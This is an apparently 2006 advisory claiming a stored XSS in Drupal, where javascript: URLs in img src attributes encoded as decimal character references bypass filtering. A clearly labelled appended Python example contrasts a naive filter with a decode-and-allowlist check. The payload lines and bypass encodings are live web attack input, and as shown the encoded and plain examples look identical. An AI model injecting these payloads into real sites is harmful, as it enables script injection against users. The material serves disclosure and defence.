From: :) :) <liz0_(at)_bsdmail.com>
Date: 03.01.2006
Subject: Drupal all versions XSS

Drupal all versions XSS
----------------------------------------------------
site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------

img tag : on

---------------------------------------------------------------------------------

Decimal Value: HTML (without semicolons)

<img src=javascript:alert('XSS')>  = <img src=javascript:alert('XSS')>

---------------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')>  = <img src=javascript:alert('XSS')>



---------------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')>
Vulnerable

post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')>
Vulnerable

 
---------------------------------------------------------

Credit:Liz0ziM
mail:liz0@bsdmail.com
www.biyo.tk , www.cehennem.org

Greetz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,
cyberlord and all friends

-----------------------------------------------------------
Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------
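The advisory reports that a filter rejecting the plain javascript: form of an img src still passes the same value written as decimal character references, with or without semicolons. The following is an added example, not part of the original advisory and not Drupal's code: it shows a raw-text check missing both encodings and a check that decodes the attribute first catching them. Function names and the http/https allowlist are assumptions.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https"}  # assumption: schemes permitted in img src

def decimal_entities(text, semicolons):
    """Encode text as decimal character references (constructed test input)."""
    end = ";" if semicolons else ""
    return "".join(f"&#{ord(ch)}{end}" for ch in text)

def naive_is_safe(src):
    """Weak check: inspects the raw attribute text, never decodes it."""
    return "javascript:" not in src.lower()

def normalize(src):
    """Decode character references the way an HTML parser does (numeric
    references are decoded even without a trailing semicolon), then drop
    whitespace and control characters so they cannot split the scheme."""
    decoded = html.unescape(src)
    return re.sub(r"[\x00-\x20\x7f]", "", decoded)

def is_safe_src(src):
    """Allow relative URLs and allowlisted schemes only, after decoding."""
    value = normalize(src)
    match = re.match(r"([a-zA-Z][a-zA-Z0-9+.\-]*):", value)
    if match is None:
        return True  # no scheme present: treated as a relative URL
    return match.group(1).lower() in ALLOWED_SCHEMES

def compare(src):
    """Return (naive verdict, decoding verdict) for one attribute value."""
    return naive_is_safe(src), is_safe_src(src)

if __name__ == "__main__":
    plain = "javascript:alert('XSS')"  # value taken from the advisory
    samples = {
        "plain": plain,
        "decimal, no semicolons": decimal_entities(plain, False),
        "decimal, semicolons": decimal_entities(plain, True),
        "ordinary image": "http://example.org/logo.png",  # constructed
    }
    for label, src in samples.items():
        naive, strict = compare(src)
        print(f"{label:24} naive_safe={naive!s:5} decoded_safe={strict}")
```

The allowlist on the decoded value is what closes the gap: a blocklist would have to anticipate every encoding, while the decoded scheme either is on the list or is not.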